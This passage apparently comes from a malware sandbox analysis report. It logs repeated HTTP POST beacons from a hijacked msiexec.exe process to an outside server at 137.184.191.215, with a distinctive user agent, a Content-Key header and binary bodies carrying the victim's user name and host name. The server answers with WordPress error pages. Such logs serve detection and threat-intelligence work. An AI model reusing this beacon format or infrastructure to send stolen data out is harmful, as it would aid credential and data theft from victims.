                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:48.330615997 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:43:48.330630064 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.549721137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:43:48.567946911 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:43:48.572784901 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:43:51.195276022 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:49 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:51.195310116 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:43:51.195353031 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:43:51.195436954 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.549723137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:43:51.345716000 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:43:51.351557970 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:43:53.977747917 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:51 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:53.977772951 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:43:53.977787018 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.549724137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:43:54.127907038 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:43:54.132905960 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:43:57.727062941 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:54 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:57.727082014 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:43:57.727099895 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress
                                      Oct 1, 2024 07:43:57.727124929 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:54 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:57.727202892 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:54 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.549725137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:43:57.874478102 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:43:57.879403114 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:00.485987902 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:58 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:00.486028910 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:00.486047029 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.549726137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:00.644911051 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
